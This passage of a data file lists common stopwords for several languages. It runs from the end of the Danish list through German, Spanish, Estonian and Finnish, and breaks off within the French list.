"kan",
"kom",
"kommer",
"lav",
"lidt",
"lille",
"man",
"mand",
"mange",
"med",
"meget",
"men",
"mens",
"mere",
"mig",
"ned",
"ni",
"nogen",
"noget",
"ny",
"nyt",
"nær",
"næste",
"næsten",
"og",
"op",
"otte",
"over",
"på",
"se",
"seks",
"ses",
"som",
"stor",
"store",
"syv",
"ti",
"til",
"to",
"tre",
"ud",
"var",
],
"de": [
"Ernst",
"Ordnung",
"Schluss",
"a",
"ab",
"aber",
"ach",
"acht",
"achte",
"achten",
"achter",
"achtes",
"ag",
"alle",
"allein",
"allem",
"allen",
"aller",
"allerdings",
"alles",
"allgemeinen",
"als",
"also",
"am",
"an",
"andere",
"anderen",
"andern",
"anders",
"au",
"auch",
"auf",
"aus",
"ausser",
"ausserdem",
"außer",
"außerdem",
"b",
"bald",
"bei",
"beide",
"beiden",
"beim",
"beispiel",
"bekannt",
"bereits",
"besonders",
"besser",
"besten",
"bin",
"bis",
"bisher",
"bist",
"c",
"d",
"d.h",
"da",
"dabei",
"dadurch",
"dafür",
"dagegen",
"daher",
"dahin",
"dahinter",
"damals",
"damit",
"danach",
"daneben",
"dank",
"dann",
"daran",
"darauf",
"daraus",
"darf",
"darfst",
"darin",
"darum",
"darunter",
"darüber",
"das",
"dasein",
"daselbst",
"dass",
"dasselbe",
"davon",
"davor",
"dazu",
"dazwischen",
"daß",
"dein",
"deine",
"deinem",
"deiner",
"dem",
"dementsprechend",
"demgegenüber",
"demgemäss",
"demgemäß",
"demselben",
"demzufolge",
"den",
"denen",
"denn",
"denselben",
"der",
"deren",
"derjenige",
"derjenigen",
"dermassen",
"dermaßen",
"derselbe",
"derselben",
"des",
"deshalb",
"desselben",
"dessen",
"deswegen",
"dich",
"die",
"diejenige",
"diejenigen",
"dies",
"diese",
"dieselbe",
"dieselben",
"diesem",
"diesen",
"dieser",
"dieses",
"dir",
"doch",
"dort",
"drei",
"drin",
"dritte",
"dritten",
"dritter",
"drittes",
"du",
"durch",
"durchaus",
"durfte",
"durften",
"dürfen",
"dürft",
"e",
"eben",
"ebenso",
"ehrlich",
"ei",
"ei,",
"eigen",
"eigene",
"eigenen",
"eigener",
"eigenes",
"ein",
"einander",
"eine",
"einem",
"einen",
"einer",
"eines",
"einige",
"einigen",
"einiger",
"einiges",
"einmal",
"eins",
"elf",
"en",
"ende",
"endlich",
"entweder",
"er",
"erst",
"erste",
"ersten",
"erster",
"erstes",
"es",
"etwa",
"etwas",
"euch",
"euer",
"eure",
"f",
"folgende",
"früher",
"fünf",
"fünfte",
"fünften",
"fünfter",
"fünftes",
"für",
"g",
"gab",
"ganz",
"ganze",
"ganzen",
"ganzer",
"ganzes",
"gar",
"gedurft",
"gegen",
"gegenüber",
"gehabt",
"gehen",
"geht",
"gekannt",
"gekonnt",
"gemacht",
"gemocht",
"gemusst",
"genug",
"gerade",
"gern",
"gesagt",
"geschweige",
"gewesen",
"gewollt",
"geworden",
"gibt",
"ging",
"gleich",
"gott",
"gross",
"grosse",
"grossen",
"grosser",
"grosses",
"groß",
"große",
"großen",
"großer",
"großes",
"gut",
"gute",
"guter",
"gutes",
"h",
"habe",
"haben",
"habt",
"hast",
"hat",
"hatte",
"hatten",
"hattest",
"hattet",
"heisst",
"her",
"heute",
"hier",
"hin",
"hinter",
"hoch",
"hätte",
"hätten",
"i",
"ich",
"ihm",
"ihn",
"ihnen",
"ihr",
"ihre",
"ihrem",
"ihren",
"ihrer",
"ihres",
"im",
"immer",
"in",
"indem",
"infolgedessen",
"ins",
"irgend",
"ist",
"j",
"ja",
"jahr",
"jahre",
"jahren",
"je",
"jede",
"jedem",
"jeden",
"jeder",
"jedermann",
"jedermanns",
"jedes",
"jedoch",
"jemand",
"jemandem",
"jemanden",
"jene",
"jenem",
"jenen",
"jener",
"jenes",
"jetzt",
"k",
"kam",
"kann",
"kannst",
"kaum",
"kein",
"keine",
"keinem",
"keinen",
"keiner",
"kleine",
"kleinen",
"kleiner",
"kleines",
"kommen",
"kommt",
"konnte",
"konnten",
"kurz",
"können",
"könnt",
"könnte",
"l",
"lang",
"lange",
"leicht",
"leide",
"lieber",
"los",
"m",
"machen",
"macht",
"machte",
"mag",
"magst",
"mahn",
"mal",
"man",
"manche",
"manchem",
"manchen",
"mancher",
"manches",
"mann",
"mehr",
"mein",
"meine",
"meinem",
"meinen",
"meiner",
"meines",
"mensch",
"menschen",
"mich",
"mir",
"mit",
"mittel",
"mochte",
"mochten",
"morgen",
"muss",
"musst",
"musste",
"mussten",
"muß",
"mußt",
"möchte",
"mögen",
"möglich",
"mögt",
"müssen",
"müsst",
"müßt",
"n",
"na",
"nach",
"nachdem",
"nahm",
"natürlich",
"neben",
"nein",
"neue",
"neuen",
"neun",
"neunte",
"neunten",
"neunter",
"neuntes",
"nicht",
"nichts",
"nie",
"niemand",
"niemandem",
"niemanden",
"noch",
"nun",
"nur",
"o",
"ob",
"oben",
"oder",
"offen",
"oft",
"ohne",
"p",
"q",
"r",
"recht",
"rechte",
"rechten",
"rechter",
"rechtes",
"richtig",
"rund",
"s",
"sa",
"sache",
"sagt",
"sagte",
"sah",
"satt",
"schlecht",
"schon",
"sechs",
"sechste",
"sechsten",
"sechster",
"sechstes",
"sehr",
"sei",
"seid",
"seien",
"sein",
"seine",
"seinem",
"seinen",
"seiner",
"seines",
"seit",
"seitdem",
"selbst",
"sich",
"sie",
"sieben",
"siebente",
"siebenten",
"siebenter",
"siebentes",
"sind",
"so",
"solang",
"solche",
"solchem",
"solchen",
"solcher",
"solches",
"soll",
"sollen",
"sollst",
"sollt",
"sollte",
"sollten",
"sondern",
"sonst",
"soweit",
"sowie",
"später",
"startseite",
"statt",
"steht",
"suche",
"t",
"tag",
"tage",
"tagen",
"tat",
"teil",
"tel",
"tritt",
"trotzdem",
"tun",
"u",
"uhr",
"um",
"und",
"und?",
"uns",
"unser",
"unsere",
"unserer",
"unter",
"v",
"vergangenen",
"viel",
"viele",
"vielem",
"vielen",
"vielleicht",
"vier",
"vierte",
"vierten",
"vierter",
"viertes",
"vom",
"von",
"vor",
"w",
"wahr?",
"wann",
"war",
"waren",
"wart",
"warum",
"was",
"wegen",
"weil",
"weit",
"weiter",
"weitere",
"weiteren",
"weiteres",
"welche",
"welchem",
"welchen",
"welcher",
"welches",
"wem",
"wen",
"wenig",
"wenige",
"weniger",
"weniges",
"wenigstens",
"wenn",
"wer",
"werde",
"werden",
"werdet",
"weshalb",
"wessen",
"wie",
"wieder",
"wieso",
"will",
"willst",
"wir",
"wird",
"wirklich",
"wirst",
"wissen",
"wo",
"wohl",
"wollen",
"wollt",
"wollte",
"wollten",
"worden",
"wurde",
"wurden",
"während",
"währenddem",
"währenddessen",
"wäre",
"würde",
"würden",
"x",
"y",
"z",
"z.b",
"zehn",
"zehnte",
"zehnten",
"zehnter",
"zehntes",
"zeit",
"zu",
"zuerst",
"zugleich",
"zum",
"zunächst",
"zur",
"zurück",
"zusammen",
"zwanzig",
"zwar",
"zwei",
"zweite",
"zweiten",
"zweiter",
"zweites",
"zwischen",
"zwölf",
"über",
"überhaupt",
"übrigens",
],
"es": [
"a",
"actualmente",
"acuerdo",
"adelante",
"ademas",
"además",
"adrede",
"afirmó",
"agregó",
"ahi",
"ahora",
"ahí",
"al",
"algo",
"alguna",
"algunas",
"alguno",
"algunos",
"algún",
"alli",
"allí",
"alrededor",
"ambos",
"ampleamos",
"antano",
"antaño",
"ante",
"anterior",
"antes",
"apenas",
"aproximadamente",
"aquel",
"aquella",
"aquellas",
"aquello",
"aquellos",
"aqui",
"aquél",
"aquélla",
"aquéllas",
"aquéllos",
"aquí",
"arriba",
"arribaabajo",
"aseguró",
"asi",
"así",
"atras",
"aun",
"aunque",
"ayer",
"añadió",
"aún",
"b",
"bajo",
"bastante",
"bien",
"breve",
"buen",
"buena",
"buenas",
"bueno",
"buenos",
"c",
"cada",
"casi",
"cerca",
"cierta",
"ciertas",
"cierto",
"ciertos",
"cinco",
"claro",
"comentó",
"como",
"con",
"conmigo",
"conocer",
"conseguimos",
"conseguir",
"considera",
"consideró",
"consigo",
"consigue",
"consiguen",
"consigues",
"contigo",
"contra",
"cosas",
"creo",
"cual",
"cuales",
"cualquier",
"cuando",
"cuanta",
"cuantas",
"cuanto",
"cuantos",
"cuatro",
"cuenta",
"cuál",
"cuáles",
"cuándo",
"cuánta",
"cuántas",
"cuánto",
"cuántos",
"cómo",
"d",
"da",
"dado",
"dan",
"dar",
"de",
"debajo",
"debe",
"deben",
"debido",
"decir",
"dejó",
"del",
"delante",
"demasiado",
"demás",
"dentro",
"deprisa",
"desde",
"despacio",
"despues",
"después",
"detras",
"detrás",
"dia",
"dias",
"dice",
"dicen",
"dicho",
"dieron",
"diferente",
"diferentes",
"dijeron",
"dijo",
"dio",
"donde",
"dos",
"durante",
"día",
"días",
"dónde",
"e",
"ejemplo",
"el",
"ella",
"ellas",
"ello",
"ellos",
"embargo",
"empleais",
"emplean",
"emplear",
"empleas",
"empleo",
"en",
"encima",
"encuentra",
"enfrente",
"enseguida",
"entonces",
"entre",
"era",
"eramos",
"eran",
"eras",
"eres",
"es",
"esa",
"esas",
"ese",
"eso",
"esos",
"esta",
"estaba",
"estaban",
"estado",
"estados",
"estais",
"estamos",
"estan",
"estar",
"estará",
"estas",
"este",
"esto",
"estos",
"estoy",
"estuvo",
"está",
"están",
"ex",
"excepto",
"existe",
"existen",
"explicó",
"expresó",
"f",
"fin",
"final",
"fue",
"fuera",
"fueron",
"fui",
"fuimos",
"g",
"general",
"gran",
"grandes",
"gueno",
"h",
"ha",
"haber",
"habia",
"habla",
"hablan",
"habrá",
"había",
"habían",
"hace",
"haceis",
"hacemos",
"hacen",
"hacer",
"hacerlo",
"haces",
"hacia",
"haciendo",
"hago",
"han",
"hasta",
"hay",
"haya",
"he",
"hecho",
"hemos",
"hicieron",
"hizo",
"horas",
"hoy",
"hubo",
"i",
"igual",
"incluso",
"indicó",
"informo",
"informó",
"intenta",
"intentais",
"intentamos",
"intentan",
"intentar",
"intentas",
"intento",
"ir",
"j",
"junto",
"k",
"l",
"la",
"lado",
"largo",
"las",
"le",
"lejos",
"les",
"llegó",
"lleva",
"llevar",
"lo",
"los",
"luego",
"lugar",
"m",
"mal",
"manera",
"manifestó",
"mas",
"mayor",
"me",
"mediante",
"medio",
"mejor",
"mencionó",
"menos",
"menudo",
"mi",
"mia",
"mias",
"mientras",
"mio",
"mios",
"mis",
"misma",
"mismas",
"mismo",
"mismos",
"modo",
"momento",
"mucha",
"muchas",
"mucho",
"muchos",
"muy",
"más",
"mí",
"mía",
"mías",
"mío",
"míos",
"n",
"nada",
"nadie",
"ni",
"ninguna",
"ningunas",
"ninguno",
"ningunos",
"ningún",
"no",
"nos",
"nosotras",
"nosotros",
"nuestra",
"nuestras",
"nuestro",
"nuestros",
"nueva",
"nuevas",
"nuevo",
"nuevos",
"nunca",
"o",
"ocho",
"os",
"otra",
"otras",
"otro",
"otros",
"p",
"pais",
"para",
"parece",
"parte",
"partir",
"pasada",
"pasado",
"paìs",
"peor",
"pero",
"pesar",
"poca",
"pocas",
"poco",
"pocos",
"podeis",
"podemos",
"poder",
"podria",
"podriais",
"podriamos",
"podrian",
"podrias",
"podrá",
"podrán",
"podría",
"podrían",
"poner",
"por",
"porque",
"posible",
"primer",
"primera",
"primero",
"primeros",
"principalmente",
"pronto",
"propia",
"propias",
"propio",
"propios",
"proximo",
"próximo",
"próximos",
"pudo",
"pueda",
"puede",
"pueden",
"puedo",
"pues",
"q",
"qeu",
"que",
"quedó",
"queremos",
"quien",
"quienes",
"quiere",
"quiza",
"quizas",
"quizá",
"quizás",
"quién",
"quiénes",
"qué",
"r",
"raras",
"realizado",
"realizar",
"realizó",
"repente",
"respecto",
"s",
"sabe",
"sabeis",
"sabemos",
"saben",
"saber",
"sabes",
"salvo",
"se",
"sea",
"sean",
"segun",
"segunda",
"segundo",
"según",
"seis",
"ser",
"sera",
"será",
"serán",
"sería",
"señaló",
"si",
"sido",
"siempre",
"siendo",
"siete",
"sigue",
"siguiente",
"sin",
"sino",
"sobre",
"sois",
"sola",
"solamente",
"solas",
"solo",
"solos",
"somos",
"son",
"soy",
"soyos",
"su",
"supuesto",
"sus",
"suya",
"suyas",
"suyo",
"sé",
"sí",
"sólo",
"t",
"tal",
"tambien",
"también",
"tampoco",
"tan",
"tanto",
"tarde",
"te",
"temprano",
"tendrá",
"tendrán",
"teneis",
"tenemos",
"tener",
"tenga",
"tengo",
"tenido",
"tenía",
"tercera",
"ti",
"tiempo",
"tiene",
"tienen",
"toda",
"todas",
"todavia",
"todavía",
"todo",
"todos",
"total",
"trabaja",
"trabajais",
"trabajamos",
"trabajan",
"trabajar",
"trabajas",
"trabajo",
"tras",
"trata",
"través",
"tres",
"tu",
"tus",
"tuvo",
"tuya",
"tuyas",
"tuyo",
"tuyos",
"tú",
"u",
"ultimo",
"un",
"una",
"unas",
"uno",
"unos",
"usa",
"usais",
"usamos",
"usan",
"usar",
"usas",
"uso",
"usted",
"ustedes",
"v",
"va",
"vais",
"valor",
"vamos",
"van",
"varias",
"varios",
"vaya",
"veces",
"ver",
"verdad",
"verdadera",
"verdadero",
"vez",
"vosotras",
"vosotros",
"voy",
"vuestra",
"vuestras",
"vuestro",
"vuestros",
"w",
"x",
"y",
"ya",
"yo",
"z",
"él",
"ésa",
"ésas",
"ése",
"ésos",
"ésta",
"éstas",
"éste",
"éstos",
"última",
"últimas",
"último",
"últimos",
],
"et": [
"aga",
"ei",
"et",
"ja",
"jah",
"kas",
"kui",
"kõik",
"ma",
"me",
"mida",
"midagi",
"mind",
"minu",
"mis",
"mu",
"mul",
"mulle",
"nad",
"nii",
"oled",
"olen",
"oli",
"oma",
"on",
"pole",
"sa",
"seda",
"see",
"selle",
"siin",
"siis",
"ta",
"te",
"ära",
],
"fi": [
"aiemmin",
"aika",
"aikaa",
"aikaan",
"aikaisemmin",
"aikaisin",
"aikajen",
"aikana",
"aikoina",
"aikoo",
"aikovat",
"aina",
"ainakaan",
"ainakin",
"ainoa",
"ainoat",
"aiomme",
"aion",
"aiotte",
"aist",
"aivan",
"ajan",
"alas",
"alemmas",
"alkuisin",
"alkuun",
"alla",
"alle",
"aloitamme",
"aloitan",
"aloitat",
"aloitatte",
"aloitattivat",
"aloitettava",
"aloitettevaksi",
"aloitettu",
"aloitimme",
"aloitin",
"aloitit",
"aloititte",
"aloittaa",
"aloittamatta",
"aloitti",
"aloittivat",
"alta",
"aluksi",
"alussa",
"alusta",
"annettavaksi",
"annetteva",
"annettu",
"ansiosta",
"antaa",
"antamatta",
"antoi",
"aoua",
"apu",
"asia",
"asiaa",
"asian",
"asiasta",
"asiat",
"asioiden",
"asioihin",
"asioita",
"asti",
"avuksi",
"avulla",
"avun",
"avutta",
"edelle",
"edelleen",
"edellä",
"edeltä",
"edemmäs",
"edes",
"edessä",
"edestä",
"ehkä",
"ei",
"eikä",
"eilen",
"eivät",
"eli",
"ellei",
"elleivät",
"ellemme",
"ellen",
"ellet",
"ellette",
"emme",
"en",
"enemmän",
"eniten",
"ennen",
"ensi",
"ensimmäinen",
"ensimmäiseksi",
"ensimmäisen",
"ensimmäisenä",
"ensimmäiset",
"ensimmäisiksi",
"ensimmäisinä",
"ensimmäisiä",
"ensimmäistä",
"ensin",
"entinen",
"entisen",
"entisiä",
"entisten",
"entistä",
"enää",
"eri",
"erittäin",
"erityisesti",
"eräiden",
"eräs",
"eräät",
"esi",
"esiin",
"esillä",
"esimerkiksi",
"et",
"eteen",
"etenkin",
"etessa",
"ette",
"ettei",
"että",
"haikki",
"halua",
"haluaa",
"haluamatta",
"haluamme",
"haluan",
"haluat",
"haluatte",
"haluavat",
"halunnut",
"halusi",
"halusimme",
"halusin",
"halusit",
"halusitte",
"halusivat",
"halutessa",
"haluton",
"he",
"hei",
"heidän",
"heihin",
"heille",
"heiltä",
"heissä",
"heistä",
"heitä",
"helposti",
"heti",
"hetkellä",
"hieman",
"hitaasti",
"hoikein",
"huolimatta",
"huomenna",
"hyvien",
"hyviin",
"hyviksi",
"hyville",
"hyviltä",
"hyvin",
"hyvinä",
"hyvissä",
"hyvistä",
"hyviä",
"hyvä",
"hyvät",
"hyvää",
"hän",
"häneen",
"hänelle",
"hänellä",
"häneltä",
"hänen",
"hänessä",
"hänestä",
"hänet",
"ihan",
"ilman",
"ilmeisesti",
"itse",
"itsensä",
"itseään",
"ja",
"jo",
"johon",
"joiden",
"joihin",
"joiksi",
"joilla",
"joille",
"joilta",
"joissa",
"joista",
"joita",
"joka",
"jokainen",
"jokin",
"joko",
"joku",
"jolla",
"jolle",
"jolloin",
"jolta",
"jompikumpi",
"jonka",
"jonkin",
"jonne",
"joo",
"jopa",
"jos",
"joskus",
"jossa",
"josta",
"jota",
"jotain",
"joten",
"jotenkin",
"jotenkuten",
"jotka",
"jotta",
"jouduimme",
"jouduin",
"jouduit",
"jouduitte",
"joudumme",
"joudun",
"joudutte",
"joukkoon",
"joukossa",
"joukosta",
"joutua",
"joutui",
"joutuivat",
"joutumaan",
"joutuu",
"joutuvat",
"juuri",
"jälkeen",
"jälleen",
"jää",
"kahdeksan",
"kahdeksannen",
"kahdella",
"kahdelle",
"kahdelta",
"kahden",
"kahdessa",
"kahdesta",
"kahta",
"kahteen",
"kai",
"kaiken",
"kaikille",
"kaikilta",
"kaikkea",
"kaikki",
"kaikkia",
"kaikkiaan",
"kaikkialla",
"kaikkialle",
"kaikkialta",
"kaikkien",
"kaikkin",
"kaksi",
"kannalta",
"kannattaa",
"kanssa",
"kanssaan",
"kanssamme",
"kanssani",
"kanssanne",
"kanssasi",
"kauan",
"kauemmas",
"kaukana",
"kautta",
"kehen",
"keiden",
"keihin",
"keiksi",
"keille",
"keillä",
"keiltä",
"keinä",
"keissä",
"keistä",
"keitten",
"keittä",
"keitä",
"keneen",
"keneksi",
"kenelle",
"kenellä",
"keneltä",
"kenen",
"kenenä",
"kenessä",
"kenestä",
"kenet",
"kenettä",
"kennessästä",
"kenties",
"kerran",
"kerta",
"kertaa",
"keskellä",
"kesken",
"keskimäärin",
"ketkä",
"ketä",
"kiitos",
"kohti",
"koko",
"kokonaan",
"kolmas",
"kolme",
"kolmen",
"kolmesti",
"koska",
"koskaan",
"kovin",
"kuin",
"kuinka",
"kuinkan",
"kuitenkaan",
"kuitenkin",
"kuka",
"kukaan",
"kukin",
"kukka",
"kumpainen",
"kumpainenkaan",
"kumpi",
"kumpikaan",
"kumpikin",
"kun",
"kuten",
"kuuden",
"kuusi",
"kuutta",
"kylliksi",
"kyllä",
"kymmenen",
"kyse",
"liian",
"liki",
"lisäksi",
"lisää",
"lla",
"luo",
"luona",
"lähekkäin",
"lähelle",
"lähellä",
"läheltä",
"lähemmäs",
"lähes",
"lähinnä",
"lähtien",
"läpi",
"mahdollisimman",
"mahdollista",
"me",
"meidän",
"meille",
"meillä",
"melkein",
"melko",
"menee",
"meneet",
"menemme",
"menen",
"menet",
"menette",
"menevät",
"meni",
"menimme",
"menin",
"menit",
"menivät",
"mennessä",
"mennyt",
"menossa",
"mihin",
"mikin",
"miksi",
"mikä",
"mikäli",
"mikään",
"milloin",
"milloinkan",
"minne",
"minun",
"minut",
"minä",
"missä",
"mistä",
"miten",
"mitä",
"mitään",
"moi",
"molemmat",
"mones",
"monesti",
"monet",
"moni",
"moniaalla",
"moniaalle",
"moniaalta",
"monta",
"muassa",
"muiden",
"muita",
"muka",
"mukaan",
"mukaansa",
"mukana",
"mutta",
"muu",
"muualla",
"muualle",
"muualta",
"muuanne",
"muulloin",
"muun",
"muut",
"muuta",
"muutama",
"muutaman",
"muuten",
"myöhemmin",
"myös",
"myöskin",
"myöskään",
"myötä",
"ne",
"neljä",
"neljän",
"neljää",
"niiden",
"niin",
"niistä",
"niitä",
"noin",
"nopeammin",
"nopeasti",
"nopeiten",
"nro",
"nuo",
"nyt",
"näiden",
"näin",
"näissä",
"näissähin",
"näissälle",
"näissältä",
"näissästä",
"näitä",
"nämä",
"ohi",
"oikea",
"oikealla",
"oikein",
"ole",
"olemme",
"olen",
"olet",
"olette",
"oleva",
"olevan",
"olevat",
"oli",
"olimme",
"olin",
"olisi",
"olisimme",
"olisin",
"olisit",
"olisitte",
"olisivat",
"olit",
"olitte",
"olivat",
"olla",
"olleet",
"olli",
"ollut",
"oma",
"omaa",
"omaan",
"omaksi",
"omalle",
"omalta",
"oman",
"omassa",
"omat",
"omia",
"omien",
"omiin",
"omiksi",
"omille",
"omilta",
"omissa",
"omista",
"on",
"onkin",
"onko",
"ovat",
"paikoittain",
"paitsi",
"pakosti",
"paljon",
"paremmin",
"parempi",
"parhaillaan",
"parhaiten",
"perusteella",
"peräti",
"pian",
"pieneen",
"pieneksi",
"pienelle",
"pienellä",
"pieneltä",
"pienempi",
"pienestä",
"pieni",
"pienin",
"puolesta",
"puolestaan",
"päälle",
"runsaasti",
"saakka",
"sadam",
"sama",
"samaa",
"samaan",
"samalla",
"samallalta",
"samallassa",
"samallasta",
"saman",
"samat",
"samoin",
"sata",
"sataa",
"satojen",
"se",
"seitsemän",
"sekä",
"sen",
"seuraavat",
"siellä",
"sieltä",
"siihen",
"siinä",
"siis",
"siitä",
"sijaan",
"siksi",
"silloin",
"sillä",
"silti",
"sinne",
"sinua",
"sinulle",
"sinulta",
"sinun",
"sinussa",
"sinusta",
"sinut",
"sinä",
"sisäkkäin",
"sisällä",
"siten",
"sitten",
"sitä",
"ssa",
"sta",
"suoraan",
"suuntaan",
"suuren",
"suuret",
"suuri",
"suuria",
"suurin",
"suurten",
"taa",
"taas",
"taemmas",
"tahansa",
"tai",
"takaa",
"takaisin",
"takana",
"takia",
"tapauksessa",
"tarpeeksi",
"tavalla",
"tavoitteena",
"te",
"tietysti",
"todella",
"toinen",
"toisaalla",
"toisaalle",
"toisaalta",
"toiseen",
"toiseksi",
"toisella",
"toiselle",
"toiselta",
"toisemme",
"toisen",
"toisensa",
"toisessa",
"toisesta",
"toista",
"toistaiseksi",
"toki",
"tosin",
"tuhannen",
"tuhat",
"tule",
"tulee",
"tulemme",
"tulen",
"tulet",
"tulette",
"tulevat",
"tulimme",
"tulin",
"tulisi",
"tulisimme",
"tulisin",
"tulisit",
"tulisitte",
"tulisivat",
"tulit",
"tulitte",
"tulivat",
"tulla",
"tulleet",
"tullut",
"tuntuu",
"tuo",
"tuolla",
"tuolloin",
"tuolta",
"tuonne",
"tuskin",
"tykö",
"tähän",
"tällä",
"tällöin",
"tämä",
"tämän",
"tänne",
"tänä",
"tänään",
"tässä",
"tästä",
"täten",
"tätä",
"täysin",
"täytyvät",
"täytyy",
"täällä",
"täältä",
"ulkopuolella",
"usea",
"useasti",
"useimmiten",
"usein",
"useita",
"uudeksi",
"uudelleen",
"uuden",
"uudet",
"uusi",
"uusia",
"uusien",
"uusinta",
"uuteen",
"uutta",
"vaan",
"vahemmän",
"vai",
"vaiheessa",
"vaikea",
"vaikean",
"vaikeat",
"vaikeilla",
"vaikeille",
"vaikeilta",
"vaikeissa",
"vaikeista",
"vaikka",
"vain",
"varmasti",
"varsin",
"varsinkin",
"varten",
"vasen",
"vasenmalla",
"vasta",
"vastaan",
"vastakkain",
"vastan",
"verran",
"vielä",
"vierekkäin",
"vieressä",
"vieri",
"viiden",
"viime",
"viimeinen",
"viimeisen",
"viimeksi",
"viisi",
"voi",
"voidaan",
"voimme",
"voin",
"voisi",
"voit",
"voitte",
"voivat",
"vuoden",
"vuoksi",
"vuosi",
"vuosien",
"vuosina",
"vuotta",
"vähemmän",
"vähintään",
"vähiten",
"vähän",
"välillä",
"yhdeksän",
"yhden",
"yhdessä",
"yhteen",
"yhteensä",
"yhteydessä",
"yhteyteen",
"yhtä",
"yhtäälle",
"yhtäällä",
"yhtäältä",
"yhtään",
"yhä",
"yksi",
"yksin",
"yksittäin",
"yleensä",
"ylemmäs",
"yli",
"ylös",
"ympäri",
"älköön",
"älä",
],
"fr": [
"a",
"abord",
"absolument",
"afin",
"ah",
"ai",
"aie",
"ailleurs",
"ainsi",
"ait",
"allaient",
"allo",
"allons",
"allô",
"alors",
"anterieur",
"anterieure",
"anterieures",
"apres",
"après",
"as",
"assez",
"attendu",
"au",
"aucun",
"aucune",
"aujourd",
"aujourd'hui",
"aupres",
"auquel",
"aura",
"auraient",
"aurait",
"auront",
"aussi",
"autre",
"autrefois",
"autrement",
"autres",
"autrui",
"aux",
"auxquelles",
"auxquels",
"avaient",
"avais",
"avait",
"avant",
"avec",
"avoir",
"avons",
"ayant",
"b",
"bah",
"bas",
"basee",
"bat",
"beau",
"beaucoup",
"bien",
"bigre",
"boum",
"bravo",
"brrr",
"c",
"car",
"ce",
"ceci",
"cela",
"celle",
"celle-ci",
"celle-là",
"celles",
"celles-ci",
"celles-là",
"celui",
"celui-ci",
"celui-là",
"cent",
"cependant",
"certain",
"certaine",
"certaines",
"certains",
"certes",
"ces",
"cet",
"cette",
"ceux",
"ceux-ci",
"ceux-là",
"chacun",
"chacune",
"chaque",
"cher",
"chers",
"chez",
"chiche",
"chut",
"chère",
"chères",
"ci",
"cinq",
"cinquantaine",
"cinquante",
"cinquantième",
"cinquième",
"clac",
"clic",
"combien",
"comme",
"comment",
"comparable",
"comparables",
"compris",
"concernant",
"contre",
"couic",
"crac",
"d",
"da",
"dans",
"de",
"debout",
"dedans",
"dehors",
"deja",
"delà",
"depuis",
"dernier",
"derniere",
"derriere",
"derrière",
"des",
"desormais",
"desquelles",
"desquels",
"dessous",
"dessus",
"deux",
"deuxième",
"deuxièmement",
"devant",
"devers",
"devra",
"different",
"differentes",
"differents",
"différent",
"différente",
"différentes",
"différents",
"dire",
"directe",
"directement",
"dit",
"dite",
"dits",
"divers",
"diverse",
"diverses",
"dix",
"dix-huit",
"dix-neuf",
"dix-sept",
"dixième",
"doit",
"doivent",
"donc",
"dont",
"douze",
"douzième",
"dring",
"du",
"duquel",
"durant",
"dès",
"désormais",
"e",
"effet",
"egale",
"egalement",
"egales",
"eh",
"elle",
"elle-même",
"elles",
"elles-mêmes",
"en",
"encore",
"enfin",
"entre",
"envers",
"environ",
"es",
"est",
"et",
"etant",
"etc",
"etre",
"eu",
"euh",
"eux",
"eux-mêmes",
"exactement",
"excepté",
"extenso",
"exterieur",
"f",
"fais",
"faisaient",
"faisant",
"fait",
"façon",
"feront",
"fi",
"flac",
"floc",
"font",
"g",
"gens",
"h",
"ha",
"hein",
"hem",
"hep",
"hi",
"ho",
"holà",
"hop",
"hormis",
"hors",
"hou",
"houp",
"hue",
"hui",
"huit",
"huitième",
"hum",
"hurrah",
"hé",
"hélas",
"i",
"il",
"ils",
"importe",
"j",
"je",
"jusqu",
"jusque",
"juste",
"k",
"l",
"la",
"laisser",
"laquelle",
"las",
"le",
"lequel",
"les",
"lesquelles",
"lesquels",
"leur",
"leurs",
"longtemps",
"lors",
"lorsque",
"lui",
"lui-meme",
"lui-même",
"là",
"lès",
"m",
"ma",
"maint",
"maintenant",
"mais",
"malgre",
"malgré",
"maximale",
"me",
"meme",
"memes",
"merci",
"mes",
"mien",
"mienne",
"miennes",
"miens",
"mille",
"mince",
"minimale",
"moi",
"moi-meme",
"moi-même",
"moindres",
"moins",
"mon",
"moyennant",
"multiple",
"multiples",
"même",
"mêmes",
"n",
"na",
"naturel",
"naturelle",
"naturelles",
"ne",
"neanmoins",
"necessaire",
"necessairement",
"neuf",
"neuvième",
"ni",
"nombreuses",
"nombreux",
"non",
"nos",
"notamment",
"notre",
"nous",
"nous-mêmes",
"nouveau",
"nul",
"néanmoins",
"nôtre",
"nôtres",
"o",
"oh",
"ohé",
"ollé",
"olé",
"on",
"ont",
"onze",
"onzième",
"ore",
"ou",
"ouf",
"ouias",
"oust",
"ouste",
"outre",
"ouvert",
"ouverte",
"ouverts",
"o|",
"où",
"p",
"paf",
"pan",
"par",
"parce",
"parfois",
"parle",
"parlent",
"parler",
"parmi",
"parseme",
"partant",
"particulier",
"particulière",
"particulièrement",
"pas",
"passé",
"pendant",
"pense",
"permet",
"personne",
"peu",
"peut",
"peuvent",
"peux",
"pff",
"pfft",
"pfut",
"pif",
"pire",
"plein",
"plouf",
"plus",
"plusieurs",
"plutôt",
"possessif",
"possessifs",
"possible",
"possibles",
"pouah",
"pour",
"pourquoi",
"pourrais",
"pourrait",
"pouvait",
"prealable",
"precisement",
"premier",
"première",
"premièrement",
"pres",
"probable",
"probante",
"procedant",
"proche",
"près",
"psitt",
"pu",
"puis",
"puisque",
"pur",
"pure",
"q",
"qu",
"quand",
"quant",
"quant-à-soi",
"quanta",
"quarante",
"quatorze",
"quatre",
"quatre-vingt",
"quatrième",
"quatrièmement",
"que",
"quel",
"quelconque",
"quelle",
"quelles",
"quelqu'un",
"quelque",
"quelques",
"quels",
"qui",
"quiconque",
"quinze",
"quoi",
"quoique",
"r",
"rare",
"rarement",
"rares",
"relative",
"relativement",
"remarquable",
"rend",
"rendre",
"restant",
"reste",
"restent",
"restrictif",
"retour",
"revoici",
"revoilà",
"rien",
"s",
"sa",
"sacrebleu",
"sait",
"sans",
"sapristi",
"sauf",
"se",
"sein",
"seize",
"selon",
"semblable",
"semblaient",
"semble",
"semblent",
"sent",
"sept",
"septième",
"sera",
"seraient",
"serait",
"seront",
"ses",
"seul",
"seule",
"seulement",
"si",
"sien",
"sienne",
"siennes",
"siens",
"sinon",
"six",
"sixième",
"soi",
"soi-même",
"soit",
"soixante",
"son",
"sont",
"sous",
"souvent",
"specifique",
"specifiques",
"speculatif",
"stop",
"strictement",
"subtiles",
"suffisant",
"suffisante",
"suffit",
"suis",
"suit",
"suivant",
"suivante",
"suivantes",
"suivants",
"suivre",
"superpose",
"sur",
"surtout",
"t",
"ta",
"tac",
"tant",
"tardive",
"te",
"tel",
